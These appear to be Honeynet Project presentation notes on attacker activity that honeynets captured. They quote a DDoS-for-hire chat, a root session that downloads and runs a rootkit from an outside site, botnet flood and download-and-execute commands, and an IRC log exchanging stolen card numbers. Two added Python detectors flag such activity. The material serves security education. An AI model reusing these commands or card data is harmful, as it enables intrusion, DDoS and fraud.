Honeypot technology can detect known and unknown attacks by emulating services and systems. Honeyd is designed for Unix systems and can monitor all unused IP addresses simultaneously while only generating a small number of alerts. It can detect activity on any port or protocol.
75. DDoS for Money
J4ck: why don't you start charging for packet attacks?
J4ck: "give me x amount and I'll take bla bla offline for this amount of time"
J1LL: it was illegal last I checked
J4ck: heh, then everything you do is illegal. Why not make money off of it?
J4ck: I know plenty of people that'd pay exorbatent amounts for packeting
79. The Old Days
Jan 8 18:48:12 HISTORY: PID=1246 UID=0 lynx www.becys.org/LUCKROOT.TAR
Jan 8 18:48:31 HISTORY: PID=1246 UID=0 y
Jan 8 18:48:45 HISTORY: PID=1246 UID=0 tar -xvfz LUCKROOT.TAR
Jan 8 18:48:59 HISTORY: PID=1246 UID=0 tar -xzvf Lu
Jan 8 18:49:01 HISTORY: PID=1246 UID=0 tar -xzvf L
Jan 8 18:49:03 HISTORY: PID=1246 UID=0 tar -xzvf LUCKROOT.TAR
Jan 8 18:49:06 HISTORY: PID=1246 UID=0 cd luckroot
Jan 8 18:49:13 HISTORY: PID=1246 UID=0 ./luckgo 216 210
Jan 8 18:51:07 HISTORY: PID=1246 UID=0 ./luckgo 200 120
Jan 8 18:51:43 HISTORY: PID=1246 UID=0 ./luckgo 64 120
Jan 8 18:52:00 HISTORY: PID=1246 UID=0 ./luckgo 216 200
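The keystroke records above are the raw material a honeynet analyst works from. As an added example (not part of the original slides), the following parses that HISTORY syslog format, regroups records into per-shell sessions by PID, and flags root sessions that follow the fetch, unpack, execute sequence seen in the capture; the toolkit-command sets and the second (non-root) session are constructed for illustration.

```python
import re
from collections import defaultdict
# One HISTORY record per command: syslog timestamp, shell PID, effective UID, command line.
LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+\s+\d\d:\d\d:\d\d) HISTORY: PID=(?P<pid>\d+) UID=(?P<uid>\d+) (?P<cmd>.*)$")

# Ordered stages of a typical toolkit install; each matcher receives the command's argv.
STAGES = (
    ("fetch", lambda argv: argv[0] in {"wget", "curl", "lynx", "ftp", "ncftp"}),
    ("unpack", lambda argv: argv[0] in {"tar", "gunzip", "gzip", "unzip"}),
    ("execute", lambda argv: argv[0].startswith("./")),
)

def parse_history(text):
    """Yield (pid, uid, timestamp, argv) for each well-formed record; ignore other lines."""
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m and m["cmd"].split():
            yield int(m["pid"]), int(m["uid"]), m["ts"], m["cmd"].split()

def sessions(text):
    """Group records by shell PID, in capture order, so each session can be replayed."""
    by_pid = defaultdict(list)
    for pid, uid, ts, argv in parse_history(text):
        by_pid[pid].append((uid, ts, argv))
    return dict(by_pid)

def flag_toolkit_installs(text):
    """Return PIDs of all-root sessions that fetch, unpack and then execute, in that order."""
    flagged = []
    for pid, records in sessions(text).items():
        if any(uid != 0 for uid, _, _ in records):
            continue
        stage = 0
        for _, _, argv in records:
            if stage < len(STAGES) and STAGES[stage][1](argv):
                stage += 1
        if stage == len(STAGES):
            flagged.append(pid)
    return flagged
# Sample input: a subset of the capture above plus one constructed non-root session (PID 2210).
SAMPLE_LOG = """\
Jan 8 18:48:12 HISTORY: PID=1246 UID=0 lynx www.becys.org/LUCKROOT.TAR
Jan 8 18:48:31 HISTORY: PID=1246 UID=0 y
Jan 8 18:48:45 HISTORY: PID=1246 UID=0 tar -xvfz LUCKROOT.TAR
Jan 8 18:49:06 HISTORY: PID=1246 UID=0 cd luckroot
Jan 8 18:49:13 HISTORY: PID=1246 UID=0 ./luckgo 216 210
Jan 8 18:51:43 HISTORY: PID=1246 UID=0 ./luckgo 64 120
Jan 8 18:52:30 HISTORY: PID=2210 UID=1001 ls -la
"""
```

The "y" answer to a prompt is kept as a record but matches no stage, so interactive noise does not break the sequence check.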
83. Bots
ddos.synflood [host] [time] [delay] [port] - starts a SYN flood
ddos.httpflood [url] [number] [referrer] [recursive = true||false] - starts an HTTP flood
scan.listnetranges - list scanned netranges
scan.start - starts all enabled scanners
scan.stop - stops all scanners
http.download - download a file via HTTP
http.execute - updates the bot via the given HTTP URL
http.update - executes a file from a given HTTP URL
cvar.set spam_aol_channel [channel] - AOL Spam - Channel name
cvar.set spam_aol_enabled [1/0] - AOL Spam - Enabled?
91. Credit Cards Exchanging
04:55:16 COCO_JAA: !cc
04:55:23 {Chk}: 0,19(0 COCO_JAA 9)0 CC for U :4,1 Bob Johns|P. O. Box 126|Wendel, CA 25631|United States|510-863-4884|4407070000588951 06/05 (All This ccs update everyday From My Hacked shopping Database - You must regular come here for got all this ccs) 8*** 9(11 TraDecS Chk_Bot FoR #goldcard9)
04:55:42 COCO_JAA: !cclimit 4407070000588951
04:55:46 {Chk}: 0,19(0 COCO_JAA 9)0 Limit for Ur MasterCard (5407070000788951) : 0.881 $ (This Doesn't Mean Its Valid) 4*** 0(11 TraDecS Chk_bot FoR #channel)
04:56:55 COCO_JAA: !cardablesite
04:57:22 COCO_JAA: !cardable electronics
04:57:27 {Chk}: 0,19(0 COCO_JAA 9)0 Site where you can card electronics : *** 9(11 TraDecS Chk_bot FoR #goldcard9)
04:58:09 COCO_JAA: !cclimit 4234294391131136
04:58:12 {Chk}: 0,19(0 COCO_JAA 9)0 Limit for Ur Visa (4264294291131136) : 9.697 $ (This Doesn't Mean Its Valid) 4*** 0(11 TraDecS Chk_bot FoR #channel)
Even more exciting is the ability to disable attacks by modifying the packet payload. Here we disable the DNS attack by replacing the exploit code with different values. Even if the exploit is successful, it will end up executing /ben/sh, which does not exist on any system. This creates a more realistic environment for attackers: they launch an attack and the victim responds, but the attack fails. The attacker will most likely never know why it failed.
Tahoora Ketabdar (Tahoora1988@gmail.com)
This is the agenda we will be following for today.
Keep in mind this statistical information was gathered during 2000-2001. We fully believe that the threats on the Internet are exponentially more active due to the release of highly automated tools, such as worms and auto-rooters.
We believe this to be a Romanian blackhat that lives on the east coast. His handle is thought to be 'Johnny17'. The Honeynet Project captured this real-time video as one of our Honeynets was under attack.
After one of our Honeynets was compromised with the dtspcd exploit, the system was used by the attackers to communicate with each other. This was part of their conversation.
Honeynets can detect activity on any protocol, increasing their chances of detecting previously unknown attacks. For example, a Honeynet was recently compromised and a backdoor was placed on the system. The backdoor used encoded IP protocol 11 packets for communication. This is a covert channel between the hacker and the compromised system. The Honeynet detected and captured this anomalous traffic and allowed us to analyze the attacker's actions. Above we see the encoded covert communications sent by the attacker to the honeypot.
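Because a honeynet carries no production traffic, an IP protocol number outside the handful it is expected to see is itself an alert. As an added example (not the Honeynet Project's own tooling), the following decodes raw IPv4 headers, verifies the header checksum, and reports packets whose protocol number is not on a constructed allow-list; the two sample packets, including the protocol 11 one with an opaque payload, are built in code rather than taken from a real capture.

```python
import struct
from ipaddress import IPv4Address

# Constructed allow-list of protocol numbers the segment is expected to carry: ICMP, TCP, UDP.
EXPECTED_PROTOCOLS = {1, 6, 17}

def rfc1071_checksum(data: bytes) -> int:
    """Ones-complement sum over 16-bit words; yields 0 when run over a header with a valid checksum."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack(f"!{len(data) // 2}H", data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF

def parse_ipv4(pkt: bytes) -> dict:
    """Decode the IPv4 header, verify its checksum and return src/dst/protocol/payload."""
    ver_ihl, _tos, total_len, _id, _frag, _ttl, proto, _csum, src, dst = struct.unpack(
        "!BBHHHBBH4s4s", pkt[:20])  # struct.error on a header shorter than 20 bytes
    ihl = (ver_ihl & 0x0F) * 4
    if ver_ihl >> 4 != 4 or ihl < 20 or total_len < ihl or len(pkt) < total_len:
        raise ValueError("malformed IPv4 header")
    if rfc1071_checksum(pkt[:ihl]) != 0:
        raise ValueError("bad IPv4 header checksum")
    return {"src": str(IPv4Address(src)), "dst": str(IPv4Address(dst)),
            "proto": proto, "payload": pkt[ihl:total_len]}

def find_unexpected_protocols(packets, expected=EXPECTED_PROTOCOLS):
    """Return one alert string per packet whose protocol number is outside the allow-list."""
    alerts = []
    for pkt in packets:
        hdr = parse_ipv4(pkt)
        if hdr["proto"] not in expected:
            alerts.append(f"{hdr['src']} -> {hdr['dst']} proto={hdr['proto']} "
                          f"payload={hdr['payload'].hex()}")
    return alerts

def build_ipv4(src: str, dst: str, proto: int, payload: bytes) -> bytes:
    """Build a minimal IPv4 packet with a correct header checksum (used only for constructed input)."""
    hdr = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(payload), 0x1234, 0, 64, proto, 0,
                      IPv4Address(src).packed, IPv4Address(dst).packed)
    csum = rfc1071_checksum(hdr)
    return hdr[:10] + struct.pack("!H", csum) + hdr[12:] + payload

# Constructed sample capture: ordinary TCP, then a protocol 11 packet carrying an opaque payload.
SAMPLE_PACKETS = [
    build_ipv4("10.0.0.5", "10.0.0.9", 6, bytes(20)),
    build_ipv4("198.51.100.7", "10.0.0.9", 11, b"\x8a\x3e\x91\x07"),
]
```

Flagging on the protocol field alone is what makes the check independent of how the payload is encoded; decoding the payload is a separate analysis step.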
Feel free to contact the Honeynet Project with any ideas, questions, or concerns you may have. If you are interested in learning more about information security in general, you can find books written by members of the Honeynet Project at http://www.honeynet.org/book/books.html
Best of luck!
--- The Honeynet Project ---